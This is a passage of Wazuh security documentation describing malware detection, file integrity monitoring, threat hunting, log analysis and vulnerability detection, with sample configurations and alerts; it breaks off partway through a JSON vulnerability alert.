Users can boost Wazuh malware detection capabilities by integrating it with threat intelligence sources. These intelligence feeds enrich the Wazuh knowledge base with additional up-to-date information on known malicious IP addresses, domains, URLs, and other indicators of compromise. Examples of threat intelligence sources Wazuh can integrate with include VirusTotal, MISP, and more.

VirusTotal integration example alert

Wazuh proactively identifies malicious files by comparing the identified IOCs with the information stored in the CDB lists (constant databases). These lists can store known malware indicators of compromise (IOCs) including file hashes, IP addresses, and domain names.

You can customize entries in either key:value or key: format for tailored detection; an example is shown below. A CDB list containing known MD5 hashes of the Mirai and Xbash malware is used for detection:

e0ec2cd43f71c80d42cd7b0f17802c73:mirai
55142f1d393c5ba7405239f232a6c059:Xbash
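
A custom rule can then look up the MD5 hash reported by the FIM module in this CDB list, along the lines of the sketch below. The rule ID, alert level, and list path are illustrative and should be adapted to your ruleset.

<group name="malware,">
  <!-- Alert when a file added to or modified on an endpoint matches a hash in the CDB list -->
  <rule id="110002" level="13">
    <if_sid>554, 550</if_sid>
    <list field="md5" lookup="match_key">etc/lists/malware-hashes</list>
    <description>File with known malware hash detected: $(file)</description>
    <mitre>
      <id>T1204.002</id>
    </mitre>
  </rule>
</group>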

Upon detection, these alerts are observed within the Threat Hunting module of the Wazuh dashboard, as seen below.

Alert of file with known malware hash

Refer to the Detecting malware using file hashes in a CDB list use case for the full configuration.

Unveiling stealthy threats with rootkit detection

Rootkits are malicious software designed to conceal the presence of malware on an endpoint by manipulating operating system functions, such as altering system calls or modifying kernel data structures. Wazuh has a Rootcheck module that periodically scans the monitored endpoint to detect rootkits at both the kernel and the user space level. The Rootcheck module identifies and alerts on potential rootkit activity. By analyzing system behavior and comparing it against known rootkit patterns, Wazuh promptly detects suspicious activity and raises alerts for further investigation.
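
Rootcheck scans are driven by the agent configuration. The sketch below, assuming a Linux agent and the bundled rootkit databases, enables the main checks and keeps the default 12-hour scan frequency.

<ossec_config>
  <rootcheck>
    <disabled>no</disabled>
    <frequency>43200</frequency>
    <!-- Signature-based checks using the bundled rootkit databases -->
    <rootkit_files>etc/rootcheck/rootkit_files.txt</rootkit_files>
    <rootkit_trojans>etc/rootcheck/rootkit_trojans.txt</rootkit_trojans>
    <!-- Anomaly-based checks: hidden files, processes, and ports -->
    <check_files>yes</check_files>
    <check_trojans>yes</check_trojans>
    <check_pids>yes</check_pids>
    <check_ports>yes</check_ports>
    <check_if>yes</check_if>
    <skip_nfs>yes</skip_nfs>
  </rootcheck>
</ossec_config>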

Below, we show an example of an alert generated by the Wazuh Rootcheck module when it detects an anomaly in the filesystem:

** Alert 1668497750.1838326: - ossec,rootcheck,pci_dss_10.6.1,gdpr_IV_35.7.d,
2022 Nov 15 09:35:50 (Ubuntu) any->rootcheck
Rule: 510 (level 7) -> 'Host-based anomaly detection event (rootcheck).'
Rootkit 't0rn' detected by the presence of file '/usr/bin/.t0rn'.
title: Rootkit 't0rn' detected by the presence of file '/usr/bin/.t0rn'.

While Wazuh continues to enhance its rootkit behavior detection capabilities, the Command monitoring module can also be configured to monitor command-line activities across endpoints, enabling the detection of malicious commands and malware activities. This module provides organizations with a comprehensive approach to uncovering hidden threats and safeguarding their systems effectively.

Monitoring system calls for malware and anomaly detection

Wazuh monitors system calls on Linux endpoints to bolster malware detection and aid anomaly detection, utilizing the Linux Audit system for this purpose.
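
A minimal sketch of the agent configuration for this, assuming auditd writes to its default log path, is shown below; the audit rules themselves are managed with the standard auditd tooling.

<ossec_config>
  <!-- Read Linux Audit events for system call monitoring -->
  <localfile>
    <log_format>audit</log_format>
    <location>/var/log/audit/audit.log</location>
  </localfile>
</ossec_config>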

System call monitoring, in combination with Wazuh File Integrity Monitoring (FIM) and threat intelligence integration, enhances malware detection. It captures security-relevant events like file access, command execution, and privilege escalation, providing real-time insights into potential security incidents. This comprehensive approach strengthens organizations' cybersecurity resilience. In the image below, you can see privilege abuse alerts on the Wazuh dashboard for an Ubuntu Linux 22.04 endpoint.

Privilege abuse alerts

Wazuh empowers security teams to leverage the audit rules provided by Auditd. Creating custom rules based on system call events enhances malware detection efforts and strengthens overall cybersecurity resilience.

File integrity monitoring

File Integrity Monitoring (FIM) involves monitoring the integrity of files and directories to detect and alert when there are file addition, modification, or deletion events. FIM provides an important layer of protection for sensitive files and data by routinely scanning and verifying the integrity of those assets. It identifies file changes that could be indicative of a cyberattack and generates alerts for further investigation and remediation if necessary.

The Wazuh open source File Integrity Monitoring module tracks the activities performed within monitored directories or files to gain extensive information on file creation, modification, and deletion. When a file is changed, Wazuh compares its checksum against a pre-computed baseline and triggers an alert if it finds a mismatch.

The open source FIM module performs real-time monitoring and scheduled scans depending on the level of sensitivity of the monitored files.

Viewing File Integrity Monitoring scan results

You can find a dedicated File Integrity Monitoring module in the Wazuh dashboard where all file integrity events triggered from monitored endpoints are reported. This increases visibility as it provides valuable information on the status of monitored directories and their potential impact on the security posture. The Wazuh FIM dashboard has three different sections to view FIM analysis results: Inventory, Dashboard, and Events.

  1. The Inventory section displays a list of all files that the FIM module has indexed. Each file has entry information including the filename, last modification date, user, user ID, group, and file size.

    File Integrity Monitoring module inventory
  2. The Dashboard section shows an overview of the events triggered by the FIM module for all monitored endpoints. You can also streamline it to show the events for a selected monitored endpoint.

    File Integrity Monitoring dashboard
  3. The Events section shows the alerts triggered by the FIM module. It displays details such as the agent name, the file path of the monitored file, the type of FIM event, a description of the alert, and the rule level of each alert.

    File Integrity Monitoring module alerts

Below are common use cases the Wazuh FIM module would assist you in monitoring within your environment.

Monitoring file integrity

Modifications to configuration files and file attributes are frequent occurrences within endpoints in an IT infrastructure. However, if not validated, there may be unauthorized and inadvertent changes that could affect the behavior of the endpoints or the applications running in them. The Wazuh FIM module runs periodic scans on specific files and directories to detect file changes in real time. It scans the designated files to create a baseline of the current state. It checks for file modifications by comparing checksums and attribute values to the baseline, generating alerts if discrepancies are found.

The Wazuh FIM module supports various configuration options that enable effective monitoring of assets, as illustrated in the configuration sketch after this list:

  • Real-time monitoring: The FIM module provides a realtime attribute that enables continuous monitoring of specified directories. This feature is particularly useful for monitoring critical directories and tracking changes immediately after they occur. Wazuh allows you to specify the directories or files in the monitored endpoints that would be reported in real-time if file changes occur.

  • Scheduled monitoring: The frequency option in the Wazuh FIM module allows users to customize the scheduling of each FIM scan performed in your monitored endpoints. The default scan interval for the FIM module is 12 hours (43200 seconds) and can be customized on each endpoint. Alternatively, scans can be scheduled using the scan_time and the scan_day options. These options help users to set up FIM scans outside business hours or during holidays.

  • Who-data monitoring: Wazuh captures advanced insights into file changes using the who-data functionality. This functionality uses audit tools like the Linux Audit subsystem and Microsoft Windows SACL to determine important information about the detected file changes. The who-data monitoring functionality allows the FIM module to obtain information on when the change event occurred, who or what made the change, and what content was changed. This is useful in maintaining accountability and validating if changes made to monitored files or directories were authorized and performed using approved processes.

    Below is an example of an alert generated when a monitored file is changed on a Windows endpoint.

    File Integrity Monitoring modified file alert

    In alert fields, the who-data metadata shows that the user wazuh added the word Hello to the audit_docu.txt file using the Notepad.exe process.

    FIM modified file alert details
  • Reporting changes in file values: The FIM module provides a report_changes attribute that records and reports the exact content changed in a text file to the Wazuh server. The attribute enables the Wazuh agent to make copies of monitored files to a private location on each endpoint for further review. This monitoring option is helpful when users want to initiate specific responses when file changes in monitored directories match the behavior of known malicious activities. For example, the alert below is generated when Wazuh detects the creation of a web shell script webshell-script.php in a monitored directory.

    Web shell scripting file creation alert
  • Recording file attributes: Users can configure the FIM module to record specific attributes of a monitored file. Wazuh supports various file attributes that users can use to specify the file metadata that the FIM module will record or ignore. For example, this monitoring option would be useful when users want to record only the SHA-256 hash of a configuration file, excluding other hash types.
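
The options described above map to settings of the syscheck block in the agent configuration. Below is a minimal sketch; the monitored paths are placeholders and should be adapted to your environment.

<ossec_config>
  <syscheck>
    <!-- Scheduled scans every 12 hours (default) -->
    <frequency>43200</frequency>

    <!-- Real-time monitoring of a critical directory (placeholder path) -->
    <directories realtime="yes">/etc</directories>

    <!-- Who-data monitoring and content diffs for a sensitive directory (placeholder path) -->
    <directories whodata="yes" report_changes="yes">/opt/app/config</directories>

    <!-- Record only selected attributes, for example the SHA-256 hash -->
    <directories check_sha256sum="yes" check_md5sum="no" check_sha1sum="no">/etc/ssh/sshd_config</directories>
  </syscheck>
</ossec_config>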

Detecting and responding to malware

The Wazuh FIM module integrates with other Wazuh capabilities and third-party threat intelligence solutions to create a comprehensive security monitoring environment. This is imperative to enhance malware detection and response capabilities, ensuring robust defense against cyber threats.

The Wazuh FIM module supports various integrations, including but not limited to:

  • File integrity monitoring and YARA: By combining the Wazuh FIM module and the YARA tool, it is possible to detect malware when suspicious file additions or modifications are identified. The YARA rule files contain samples of malware indicators that are downloaded to the monitored endpoints. When the FIM module detects a change in the monitored file or directory, it executes a YARA scan using a script to determine if it is malware. If the YARA rule finds a match with a file, it will send the scan results to the Wazuh server for decoding and alerting. This would be reported according to the custom rule and decoder configurations configured on the Wazuh server. Check this documentation for more information on how to integrate the Wazuh FIM module with YARA.

  • File integrity monitoring and VirusTotal: The Wazuh Integrator module connects to external APIs and alerting tools such as VirusTotal. The VirusTotal integration uses the VirusTotal API to detect malicious file hashes within the files and directories monitored by the FIM module. Once enabled, when FIM generates alerts, Wazuh initiates the VirusTotal integration to extract the hash value associated with the flagged file from the alert. The VirusTotal API is then used to compare these hashes against its scanning engines for potentially malicious content.

  • File integrity monitoring and Active Response: The Wazuh Active Response module automatically responds to identified threats in a timely manner. This combination enables the FIM module to not only detect but also respond to malicious activities. You can configure active response scripts to execute when the FIM module detects file changes in your monitored environment. Additionally, it generates alerts for the responses performed. This reduces the Mean Time To Respond (MTTR), as detected malicious changes are remediated quickly.

    In the image below, Wazuh triggers an alert when a file is added to the monitored endpoint. The VirusTotal API scans the file and identifies it as malicious on 55 engines. The Wazuh Active Response module then acts immediately to remove the threat from the monitored endpoint. A configuration sketch for this workflow is shown after this list.

    FIM and Active Response using VirusTotal alerts
  • File integrity monitoring and CDB list: The Wazuh FIM module also detects malicious files by checking for the presence of known malware signatures when combined with CDB lists (constant databases). CDB lists are used to store known malware indicators of compromise (IOCs) such as file hashes, IP addresses, and domain names. When CDB lists are created, Wazuh checks whether field values from FIM alerts, such as file hashes, match the keys stored in the CDB lists. If matched, it generates an alert and a response based on how you configure your custom rule.

    File with known malware hash detected and removed alerts
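
As a rough sketch of the VirusTotal and Active Response combination described above, the server-side configuration below forwards FIM (syscheck) alerts to VirusTotal and runs a removal script when a file is flagged as malicious. The API key is a placeholder, the remove-threat script is a hypothetical custom active response script that must exist on the agents, and the rule ID should be verified against the VirusTotal ruleset in your deployment.

<ossec_config>
  <!-- Send FIM (syscheck) alerts to VirusTotal -->
  <integration>
    <name>virustotal</name>
    <!-- Placeholder API key -->
    <api_key>YOUR_VIRUSTOTAL_API_KEY</api_key>
    <group>syscheck</group>
    <alert_format>json</alert_format>
  </integration>

  <!-- Hypothetical custom active response script deployed on the agents -->
  <command>
    <name>remove-threat</name>
    <executable>remove-threat.sh</executable>
    <timeout_allowed>no</timeout_allowed>
  </command>

  <!-- Run the script when VirusTotal reports positives for the file -->
  <active-response>
    <disabled>no</disabled>
    <command>remove-threat</command>
    <location>local</location>
    <rules_id>87105</rules_id>
  </active-response>
</ossec_config>
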
Monitoring Windows Registry

The Wazuh FIM module periodically scans Windows Registry entries, stores their checksums and attributes in a local database, and alerts when changes in registry values are detected. This keeps users informed about registry modifications resulting from user activities or software installations, whether malicious or not.

You can configure the Wazuh open source FIM module to monitor Windows Registry values using various configuration options. The report_changes attribute in the windows_registry option provides a granular breakdown of modifications detected in the monitored Windows Registry values. You can configure which Windows Registry attributes the module will record or ignore. For example, you can choose to record the check_sha1sum attribute and ignore the check_md5sum attribute if your CDB list only contains SHA1 hashes of malicious files.
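
A minimal sketch of such a configuration on a Windows agent is shown below; the monitored key is a commonly targeted startup location, and the attribute choices mirror the example above.

<ossec_config>
  <syscheck>
    <!-- Monitor a startup key in both 32-bit and 64-bit registry views, recording SHA1 but not MD5 checksums -->
    <windows_registry arch="both" report_changes="yes" check_sha1sum="yes" check_md5sum="no">HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</windows_registry>
  </syscheck>
</ossec_config>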

The image below shows the event of a modified Windows registry value in a monitored endpoint.

FIM modified registry key alert

The alert when expanded shows the modified field.

FIM modified registry key alert details

Threat actors commonly maintain persistence by adding their malicious programs to the Run and RunOnce keys in the Windows Registry. Wazuh detects suspicious programs added to these startup registry keys, allowing you to take appropriate action to remove them before they cause harm to your system.

FIM registry value added alert
Meeting regulatory compliance

Meeting regulatory compliance requirements is an important consideration for organizations in various industries. File integrity monitoring is a requirement for achieving compliance with regulations such as PCI DSS, SOX, HIPAA, NIST SP 800-53, among others.

You can customize the Wazuh FIM module to monitor specific files and directories where your organization’s sensitive and confidential data are stored. Wazuh provides a comprehensive report that outlines the changes made to the files and directories being monitored. This feature is particularly useful for ensuring compliance with various regulatory standards.

For example, organizations can meet the CM-3 Configuration change control requirement in NIST SP 800-53 standard by using Wazuh. The control requires organizations to protect information at rest and monitor configuration changes in their infrastructure. The image below shows an event generated when the permissions for Uncomplicated Firewall (UFW) rule files are modified on a monitored endpoint.

UFW user rules file modification alert
Threat hunting

Threat hunting is a proactive approach that involves analyzing numerous data sources like logs, network traffic, and endpoint data to identify and eliminate cyber threats that have evaded traditional security measures. It aims to uncover potential threats that may have gone undetected in an IT environment. The process of threat hunting typically involves several steps: hypothesis generation, data collection, analysis, and response.

Wazuh offers several capabilities that assist security teams in hunting threats within their environment, empowering them to take rapid actions to contain the threat and prevent further damage.

Log data analysis

Effective log data collection and analysis are essential for enhancing your threat hunting methodology. You can leverage the robust capabilities of Wazuh to optimize your threat hunting efforts.

Wazuh, as a unified XDR and SIEM platform, offers centralized log data collection, allowing data to be gathered from diverse sources such as endpoints, network devices, and applications. This centralized approach simplifies analysis and reduces the effort required to monitor multiple sources.

The image below shows the configuration settings on the Wazuh dashboard for collecting audit logs from a monitored endpoint.

Log collection settings

Wazuh uses decoders to extract meaningful information from log data obtained from various sources. It breaks down raw log data into individual fields or attributes, such as timestamp, source IP address, destination IP address, event type, and others. The Index patterns tab on the Wazuh dashboard shows the wazuh-alerts-* index pattern and its fields.

wazuh-alerts-* index pattern

Wazuh offers agentless monitoring and Syslog log collection for efficient log data handling. It ensures consistency and compatibility across various log formats. Wazuh indexing and querying capabilities facilitate quick search and access to specific log data, streamlining analysis and investigation. Wazuh uses advanced parsing and real-time analysis to strengthen threat hunting by proactively identifying and mitigating risks.

Wazuh archives

Wazuh provides a centralized storage location for archiving all logs collected from monitored endpoints. Wazuh archives store all events, including those that do not trigger alerts on the Wazuh dashboard. Wazuh archives are disabled by default and can be easily enabled. The availability of detailed logs is crucial for effective threat hunting, providing comprehensive visibility into your environment.
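
Archiving is enabled by setting the logall options in the global section of the Wazuh server configuration at /var/ossec/etc/ossec.conf; to make the archives searchable on the dashboard, archives must also be enabled in the Filebeat configuration on the server. A minimal sketch of the ossec.conf part:

<ossec_config>
  <global>
    <logall>yes</logall>
    <logall_json>yes</logall_json>
  </global>
</ossec_config>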

Wazuh archives provide log retention, indexing, and querying capabilities that give you the visibility needed to analyze events on specific monitored endpoints in your environment. This facilitates uncovering the cause, origin, network communications, timestamp, and related parent-child processes of an event. The image below shows the archived logs in the Discover section on the Wazuh dashboard.

wazuh-archives in the Discover section
MITRE ATT&CK mapping

The MITRE ATT&CK framework offers a standardized approach to mapping and understanding cyber attack tactics, techniques, and procedures (TTPs). By utilizing the Wazuh MITRE ATT&CK module, we can enhance our understanding of TTPs used by threat actors and proactively defend against them.

The Wazuh MITRE ATT&CK module maps TTPs to generated events, facilitating efficient threat hunting by promptly identifying patterns in attacker behavior. For instance, a suspicious login attempt can be associated with the “Credential Stuffing” technique in the MITRE ATT&CK framework. This empowers users to assess the frequency of such attacks and implement necessary measures to mitigate risks, such as enabling multi-factor authentication or rate-limiting login attempts. The MITRE ATT&CK module on the Wazuh dashboard allows you to view various techniques found within a monitored environment.

The MITRE ATT&CK module

This module generates reports and visualizations on the Wazuh dashboard, showcasing the frequency and severity of attacks utilizing specific TTPs. These reports help track compliance with security standards and regulations while highlighting areas where security measures may require strengthening. The Wazuh MITRE ATT&CK module on the Wazuh dashboard has a customizable dashboard that displays an overview of TTPs found within a monitored environment as seen below.

The MITRE ATT&CK module dashboard

You can proactively protect your systems and data by leveraging insights from the MITRE ATT&CK framework. The integration of MITRE ATT&CK with Wazuh significantly enhances threat hunting and improves overall security.

Third-party integration

Wazuh integrates with third-party solutions that enhance threat hunting capabilities. These integrations enable users to consolidate data from diverse sources and automate threat detection and response. Wazuh seamlessly integrates with popular open source platforms like VirusTotal, AlienVault, URLHaus, MISP, and many others. This integration allows users to cross-reference telemetry with threat intelligence feeds, improving detection and response to threats.

Third-party integrations play a crucial role in proactive threat hunting, encompassing threat intelligence and a range of collaborative tools. These integrations provide essential insights into both established and emerging threats, enabling a comprehensive and forward-looking approach to threat detection. By promoting the exchange of information among seasoned security teams, these integrations foster a collective defense strategy, enhancing the effectiveness of the overall threat hunting process.

Some third-party solutions that Wazuh integrates with to aid threat hunting are:

  • VirusTotal: Integrating VirusTotal enhances threat detection by leveraging the VirusTotal malware database for accurate identification and faster incident response. The image below shows malware detection via the VirusTotal integration.

    Malware detection via the VirusTotal integration
  • URLHaus: Integrating URLHaus by abuse.ch with Wazuh amplifies threat intelligence capabilities, empowering users to proactively detect and block malicious URLs in real-time.

  • MISP: Integrating MISP with Wazuh enriches alerts by automating the identification of IOCs.

Wazuh integrates with other tools that aid threat hunting beyond the above-mentioned. It supports third-party integrations for threat intelligence platforms, SIEMs, and messaging platforms using APIs and other integration methods.
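
As an illustration, the VirusTotal integration listed above is enabled with an integration block in the Wazuh server configuration. A minimal sketch, assuming FIM (syscheck) alerts are the trigger and a valid API key replaces the placeholder:

<integration>
  <name>virustotal</name>
  <api_key>REPLACE_WITH_VIRUSTOTAL_API_KEY</api_key>
  <group>syscheck</group>
  <alert_format>json</alert_format>
</integration>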

Rules and decoders

Wazuh enhances threat hunting with robust decoders and an extensive set of pre-configured rules covering diverse attack vectors and cyber activities.

The Rules module on the Wazuh dashboard presents both default and custom rules, covering a broad array of security events, including system anomalies, malware detection, authentication failures, and other potential threats as seen below.

Wazuh dashboard rules view

Wazuh allows you to customize and create your own rules and decoders, tailored to your specific environment and threat landscape. This enables you to fine-tune detection, address unique requirements, and minimize blind spots.

Wazuh decoders play a vital role in normalizing and parsing diverse log formats and data sources. They ensure that collected information is presented in a standardized manner, facilitating effective analysis and correlation of data from various sources.
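
As an illustration, a minimal custom decoder could extract fields from a hypothetical application log such as "example-app: user=jdoe srcip=10.0.0.5 action=denied". The program name, regular expression, and field names below are illustrative:

<decoder name="example-app">
  <prematch>^example-app: </prematch>
</decoder>

<decoder name="example-app-fields">
  <parent>example-app</parent>
  <regex>user=(\S+) srcip=(\S+) action=(\S+)</regex>
  <order>user, srcip, action</order>
</decoder>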

The Decoders module on the Wazuh dashboard allows you to view default and custom decoders. The image below shows details of the default decoder agent-upgrade.

Details of the default agent-upgrade decoder

Leveraging Wazuh rules and decoders, security teams attain actionable insights, enabling them to swiftly detect IOCs, anomalous behavior, and potential breaches.

Refer to the Wazuh ruleset documentation for detailed guidance on configuring custom rules and decoders.

Log data analysis

Log data analysis is a crucial process that involves examining and extracting valuable insights from log files created by different systems, applications, or devices. These logs contain records of events that provide useful information for troubleshooting, security analysis and monitoring, and optimizing performance. Log data analysis is an essential practice that contributes to a secure, efficient, and reliable IT ecosystem.

Wazuh collects, analyzes, and stores logs from endpoints, network devices, and applications. The Wazuh agent, running on a monitored endpoint, collects and forwards system and application logs to the Wazuh server for analysis. Additionally, you can send log messages to the Wazuh server via syslog or third-party API integrations.

Log data collection

Wazuh collects logs from a wide range of sources, enabling comprehensive monitoring of various aspects of your IT environment. You can check our documentation on Log data collection to understand better how Wazuh collects and analyzes logs from monitored endpoints. Some of the common log sources supported by Wazuh include:

  • Operating system logs: Wazuh collects logs from several operating systems, including Linux, Windows, and macOS.

    Wazuh can collect syslog, auditd, application logs, and others from Linux endpoints.

    Wazuh collects logs on Windows endpoints using the Windows event channel and Windows event log format. By default, the Wazuh agent monitors the System, Application, and Security Windows event channels on Windows endpoints. The Wazuh agent offers the flexibility to configure and monitor other Windows event channels.

    Wazuh utilizes the unified logging system (ULS) to collect logs on macOS endpoints. The macOS ULS centralizes the management and storage of logs across all the system levels.

    The image below shows an event collected from the Microsoft-Windows-Sysmon/Operational event channel on a Windows endpoint. A configuration sketch for collecting this channel is shown after this list.

    Sysmon operational Event channel alert
  • Syslog events: Wazuh gathers logs from syslog-enabled devices, encompassing a wide array of sources including Linux/Unix systems and network devices that do not support agent installation. The image below shows an alert triggered when a new user is created on the Linux endpoint and the log is forwarded to the Wazuh server via rsyslog.

    New user added to the system alert
  • Agentless monitoring: The Wazuh agentless monitoring module monitors endpoints that don't support agent installation. It requires an SSH connection between the endpoint and the Wazuh server. The Wazuh agentless monitoring module monitors files, directories, or configurations and runs commands on the endpoint. The image below is an alert from an agentless device on the Wazuh dashboard.

    Agentless device alert
  • Cloud provider logs: Wazuh integrates with cloud providers like AWS, Azure, Google Cloud, and Office 365 to collect logs from cloud services such as EC2 instances, S3 buckets, Azure VMs, and more. The image below shows the CLOUD SECURITY section in the Wazuh dashboard.

    Cloud provider modules
  • Custom logs: You can configure Wazuh to collect and parse logs from several applications and third-party security tools like VirusTotal, Windows Defender, and ClamAV. The image below shows an alert of a log from VirusTotal processed by the Wazuh server.

    VirusTotal log alert
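
As referenced above, Windows event channels such as Microsoft-Windows-Sysmon/Operational are collected by adding a localfile block to the Wazuh agent configuration. A minimal sketch, assuming Sysmon is installed and logging to its default operational channel:

<localfile>
  <location>Microsoft-Windows-Sysmon/Operational</location>
  <log_format>eventchannel</log_format>
</localfile>
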
Rules and decoders

Wazuh rules and decoders are core components in log data analysis and threat detection and response. Wazuh provides a powerful platform for log data analysis, allowing organizations to enhance their security posture by promptly detecting and responding to potential security threats.

Wazuh decoders are responsible for parsing and normalizing log data collected from various sources. Decoders are essential for converting raw log data in several formats into a unified and structured format that Wazuh can process effectively. Wazuh has pre-built decoders for common log formats such as syslog, Windows event channel, macOS ULS, and more. Additionally, Wazuh allows you to define custom decoders for parsing logs from specific applications or devices with unique log formats. By using decoders, Wazuh can efficiently interpret log data and extract relevant information, such as timestamps, log levels, source IP addresses, user names, and more. As shown below, you can view Wazuh out-of-the-box and custom decoders on the Server management > Decoders page of the Wazuh dashboard.

Decoders in Wazuh dashboard

The Wazuh ruleset detects security events and anomalies in log data. These rules are written in a specific format, and they trigger alerts when certain conditions are met. The rules are defined based on criteria like log fields, values, or patterns to match specific log entries that may indicate security threats. Wazuh provides a wide range of pre-built rules covering common security use cases. Additionally, administrators can create custom rules tailored to their specific environment and security requirements. The Server management section of the Wazuh dashboard lets you view the default and custom rules.

Rules in Wazuh dashboard

For example, the rule below includes a match field used to define the pattern that the rule looks for. The rule also has a level field that specifies the priority of the resulting alert. Additionally, rules enrich events with technique identifiers from the MITRE ATT&CK framework and map them to regulatory compliance controls.

<rule id="5715" level="3">
  <if_sid>5700</if_sid>
  <match>^Accepted|authenticated.$</match>
  <description>sshd: authentication success.</description>
  <mitre>
    <id>T1078</id>
    <id>T1021</id>
  </mitre>
  <group>authentication_success,gdpr_IV_32.2,gpg13_7.1,gpg13_7.2,hipaa_164.312.b,nist_800_53_AU.14,nist_800_53_AC.7,pci_dss_10.2.5,tsc_CC6.8,tsc_CC7.2,tsc_CC7.3,</group>
</rule>
Log data indexing and storage

The Wazuh indexer is a highly scalable, distributed, real-time search and analytics engine. It is critical in log analysis as it stores and indexes alerts generated by the Wazuh server. These alerts are stored as JSON documents.

The Wazuh indexer guarantees redundancy by distributing the JSON documents across several containers called shards and replicating the shards across multiple nodes. This implementation prevents data loss and downtime when hardware failures or cyber attacks occur and increases query capacity as nodes are added to a cluster.

Wazuh uses four indices to store different types of data:

  • wazuh-alerts stores alerts generated by the Wazuh server when an event triggers a rule with high enough priority. The image below shows alerts in the Discover module of the Wazuh dashboard. The index pattern is set to wazuh-alerts-* by default.

    Alerts in the wazuh-alerts-* index pattern
  • wazuh-archives index stores all events received by the Wazuh server regardless of whether they trigger an alert. The Wazuh archives use this index to enable log retention and querying capabilities that offer deeper insight into events happening within monitored endpoints. Wazuh archives are disabled by default because of the large storage requirements needed to store all the logs. The image below shows archived events in the Discover section of the Wazuh dashboard with the index pattern set to wazuh-archives-*.

    Events in wazuh-archives-* index pattern
  • wazuh-monitoring index stores data about the state of Wazuh agents over time. The state of an agent can be Active, Disconnected, or Never connected. This information is useful for tracking Wazuh agents that have stopped reporting so that the cause can be investigated. The image below shows the connection status of the agents on the Wazuh dashboard. The agent information shown in the image is collected from the wazuh-monitoring index.

    Agent information from wazuh-monitoring index
  • wazuh-statistics index stores performance data related to the Wazuh server. This information is critical to ensuring the Wazuh server performs optimally with the available computing resources. The image below shows performance-related events on the Wazuh dashboard.

    Performance-related events
Log data querying and visualization

The Wazuh dashboard offers log data querying and visualization capabilities. You can leverage the dashboard’s intuitive interface to conduct complex searches and queries to extract meaningful insights from the log data collected by Wazuh.

Wazuh provides a set of predefined dashboards and visualizations out of the box, specifically tailored to security monitoring and compliance use cases. These dashboards provide insight into common security events such as failed logins, malware detection, and system anomalies. You can further customize these dashboards to suit your specific needs and requirements. Below is a sample image of the Security event dashboard showing information such as the Top 5 PCI DSS Requirements, Top 5 alerts, and Alert groups evolution.

Security event dashboard

The Wazuh dashboard enables users to explore log entries in real time, apply various filters, and drill down into specific events or time ranges. This flexibility allows security analysts to identify trends, anomalies, and potential security incidents within their environment.

Wazuh allows users to create customized dashboards that display key performance indicators, security metrics, and real-time monitoring of critical systems and applications. Users can assemble multiple visualizations, such as pie charts, line graphs, and heat maps, onto a single dashboard, providing a holistic view of their infrastructure's security posture. The Wazuh blog details how to query log data and create custom dashboards.

Vulnerability detection

Software vulnerabilities are weaknesses in code that can allow attackers to gain access to or manipulate the behavior of an application. Vulnerable software applications are commonly targeted by attackers to compromise endpoints and gain a persistent presence on targeted networks.

Vulnerability detection is the process of identifying these flaws before they are discovered and exploited by attackers. The goal of vulnerability detection is to identify vulnerabilities so that remediation can be carried out to prevent successful attacks.

The Wazuh agent uses the Syscollector module to collect inventory details from the monitored endpoint. It sends the collected data to the Wazuh server. Within the Wazuh server, the Vulnerability Detection module correlates the software inventory data with vulnerability content documents to detect vulnerable software on the monitored endpoint.
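
On recent Wazuh releases (4.8 and later), the Vulnerability Detection module is enabled on the Wazuh server while the Syscollector module runs on the agent. A minimal sketch of the server-side block follows; option names may differ on older releases that used the vulnerability-detector wodle:

<vulnerability-detection>
  <enabled>yes</enabled>
  <index-status>yes</index-status>
  <feed-update-interval>60m</feed-update-interval>
</vulnerability-detection>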

Wazuh detects vulnerable applications and generates risk reports using our Cyber Threat Intelligence (CTI) platform. In this platform, we aggregate vulnerability data from diverse sources like operating system vendors and vulnerability databases, consolidating it into a unified, reliable repository. The process involves standardizing the varied formats into a common structure. Additionally, we maintain the integrity of our vulnerability data by doing the following:

  • Rectifying format inconsistencies like version errors and typos.

  • Completing missing information.

  • Incorporating new cybersecurity vulnerabilities.

Subsequently, we merge this content, uploading the compiled documents to a cloud server. Finally, we publish these documents to our CTI API.

Relying on the Wazuh CTI, the Vulnerability Detection module supports applications and a variety of operating systems, including Windows, CentOS, Red Hat Enterprise Linux, Ubuntu, Debian, Amazon Linux, Arch Linux, and macOS.

Achieve comprehensive visibility

The Vulnerability Detection module generates alerts for vulnerabilities discovered on the operating system and applications installed on the monitored endpoint. It correlates the software inventory collected by the Wazuh agent with the vulnerability content documents and displays the alert generated on the Wazuh dashboard. This provides a clear and comprehensive view of vulnerabilities identified in all monitored endpoints, allowing you to view, analyze and fix vulnerabilities.

The vulnerability detection dashboard shows the frequency of occurrences in different categories such as package name, operating system, agent name, vulnerability ID, and alert severity. This allows analysts to direct their focus appropriately.

Vulnerabilities inventory

You can view the alerts generated on the dashboard when new vulnerabilities are discovered.

Vulnerability alerts

The alerts generated on the dashboard could also be a result of remediation activities. The image below shows alerts generated after an upgrade or an uninstallation of a package resolved a vulnerability.

Resolved vulnerability alerts
Obtain actionable intelligence from vulnerability alerts

Wazuh vulnerability alerts contain relevant information about the identified vulnerability which can help users understand and decide on remediation steps. You can see an example of a vulnerability detection alert below:

Vulnerability alert example
{
 "_index": "wazuh-alerts-4.x-sample-threat-detection",
 "_id": "e2ffSY8Be9PWdpLhA_nt",
 "_version": 1,
 "_score": null,
 "_source": {
   "predecoder": {},
   "cluster": {
     "name": "wazuh"
   },
   "agent": {
     "ip": "197.17.1.4",
     "name": "Centos",
     "id": "005"
   },
   "manager": {
     "name": "wazuh-server"
   },
   "data": {
     "vulnerability": {
       "severity": "Medium",
       "package": {
         "condition": "Package less or equal than 2.1.7.3-2",
         "name": "cryptsetup",
         "version": "2:1.6.6-5ubuntu2.1",
         "architecture": "amd64"
       },
       "references": [
         "http://hmarco.org/bugs/CVE-2016-4484/CVE-2016-4484_cryptsetup_initrd_shell.html",
         "http://www.openwall.com/lists/oss-security/2016/11/14/13",
         "http://www.openwall.com/lists/oss-security/2016/11/15/1",
         "http://www.openwall.com/lists/oss-security/2016/11/15/4",
         "http://www.openwall.com/lists/oss-security/2016/11/16/6",
         "http://www.securityfocus.com/bid/94315",
         "https://gitlab.com/cryptsetup/cryptsetup/commit/ef8a7d82d8d3716ae9b58179590f7908981fa0cb",
         "https://nvd.nist.gov/vuln/detail/CVE-2016-4484",
         "http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4484.html",
         "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4484"
       ],
       "cve_version": "4.0",
